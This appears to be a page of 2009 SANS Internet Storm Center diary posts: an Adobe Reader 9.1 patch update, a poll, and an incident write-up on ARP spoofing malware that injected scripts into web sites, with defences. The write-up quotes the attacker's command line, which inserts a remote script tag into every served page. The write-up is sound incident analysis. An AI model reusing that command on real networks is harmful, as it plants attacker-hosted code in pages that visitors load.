Adobe Update is finally out, well, some of them

Published: 2009-03-11
Last Updated: 2009-03-11 21:45:25 UTC
by Joel Esler (Version: 2)
5 comment(s)

Thank you all that wrote in letting us know that the Adobe Update for Reader and Acrobat 9 is finally out.  Swa pointed this out in his diary right here.  However, I wanted to expand upon the update a little bit, because I still find it to be "wanting".

Adobe has named this release "9.1" for both Adobe Reader and Adobe 9 (Standard, Pro, and Pro Extended).  The patch is out for Windows and Macintosh only, however. 

Adobe says they plan for updates to Reader 7 and 8 and Acrobat 7 and 8 to be out by March 18th.  They also plan to make Adobe Reader 9.1 available for Unix by March 25th.

As a work around, Adobe says to refer to this post for a work around on how to disable Javascript so that you won't be affected, however, as our readers of the Internet Storm Center and the VRT Blog know, this is not a Javascript exploit, and you can still be exploited without javascript turned on!

So, Adobe did fix the issue for users of "9" on Windows and Mac, but the other platforms are still vulnerable.  If you are using Adobe 7 or 8, if you can update to 9.1, that would be for the best.

(Yes, I work for Sourcefire.)

-- Joel Esler http://www.joelesler.net

UPDATE

Couple of readers wrote to say that it appears that the update installs other Adobe applications as well, such as Adobe Air.

Another reader wrote to say that a lite version is available at ftp://ftp.adobe.com/pub/adobe/reader/win/9.x/9.1/enu/, but only as an EXE file (you'll have to create the MSI yourself if you want to use it for deployment).

-- Bojan

Keywords:
5 comment(s)

Do you have Wireless on your network?

Published: 2009-03-11
Last Updated: 2009-03-11 20:19:53 UTC
by Joel Esler (Version: 2)
0 comment(s)

We have a new poll up on the right hand side of the ISC front page.  --->

If you don't mind, can you take a few seconds and submit your answers about your deployment of 802.11n (if you have one).

Thanks!

Update -- If you are having problems seeing the poll, please go to: "http://isc.sans.org/" to see the full front page.  Polls don't exist on the individual diary pages.  Thanks for writing in, however, we can't answer you back if you don't leave your email.

-- Joel Esler http://www.joelesler.net

Keywords:
0 comment(s)

Massive ARP spoofing attacks on web sites

Published: 2009-03-11
Last Updated: 2009-03-11 00:34:49 UTC
by Bojan Zdrnja (Version: 1)
12 comment(s)

Recently I’ve been involved in two incidents which had exactly the same modus operandi. The attackers used ARP spoofing to inject malicious JavaScript into content served off other web sites. The biggest problem with such attacks is that it can be very difficult to analyze them unless you remember to check layer two network traffic. Such attacks are very covert and put in danger all web sites in the same subnet.

So, first a short recap about ARP spoofing. ARP spoofing attacks happen on layer two – the Address Resolution Protocol maps IP addresses and MAC addresses, which is what is used to communicate in local subnets. ARP spoofing attacks are nothing new – they have been happening for years already. The basic idea of an ARP spoofing attack is for the attacker to spoof IP address <-> MAC address pair of the default gateway. This allows him to intercept (and, if needed modify) all outgoing traffic from that subnet. The attacker can also spoof the IP address <-> MAC address pair of a local server in which case he could monitor incoming traffic, but in this scenario that was not necessary.

The spoofing attack consists of the attacker sending ARP packets containing fake data to the target. In normal conditions the target machine will accept this and “believe” whatever the attacker is saying.

This is exactly what happened in both incidents I was involved in. A server on a local subnet was compromised and the attacker installed ARP spoofing malware (together with keyloggers and other Trojans) on the machine. The ARP spoofing malware poisoned local subnet so the outgoing traffic was tunneled through it. The same malware then inserted malicious JavaScript into every HTML page served by any server on that subnet. You can see how this is fruitful for the attacker – with one compromised server they can effectively attack hundreds of web sites (if it’s a hoster indeed).

The ARP spoofing malware they used was relatively common, but still AV detection was miserable with major AV programs missing it (both compromised machines had up to date AV programs installed). In order to start the malware the attackers used a simple BAT script:

svchost.exe -idx 0 -ip IP_address -port 80 -insert "<script language=javascript src=http://embedded/images/new.gif></script>" -Interval 1000 -spoofmode 2

svchost.exe’s options are self explanatory – it uses the interface 0 (idx) and spoofs the IP address in the ip option. Finally it inserts whatever is in the insert option into every HTML page served.

Nice thing for the attacker is that the administrator of an attacked web site will never figure out what’s going on until he checks the ARP cache or monitors network traffic. The ARP cache can be checked with the arp command (arp –a on both Windows and Linux) – one should watch out for weird MAC addresses. It usually pays to check the OID owner because you don’t see Dell routers all that often as shown in the following Wireshark screenshot of ARP poisoning traffic:

ARP poisoning

There are various ways for defending against ARP spoofing. One can hard code MAC addresses of routers on servers (be careful with this as changes to the default gateway will stop your machines from talking to the Internet until you modify the hard coded address). I would recommend installation of Arpwatch, a nice and simple tool that monitors ARP traffic and alerts on attacks. Finally, Cisco (and others I presume) has features called DHCP Snooping and ARP inspection which can effectively stop ARP poisoning attacks. Sadly, I rarely see these features used, especially in internal network.

Regarding other malware I mentioned previously, the AV detection rates were similarly poor (in the mean time they improved). Particularly nasty was the Winlogon Notify hook package which simply “sniffs” all usernames/passwords of users logging in to the system (so password changes don’t help). This package has been around for ages (the source is public) and I was shocked how simple modifications made it “invisible” to those AV programs.

--
Bojan
INFIGO IS 

Keywords: arp spoofing
12 comment(s)

Comments


Diary Archives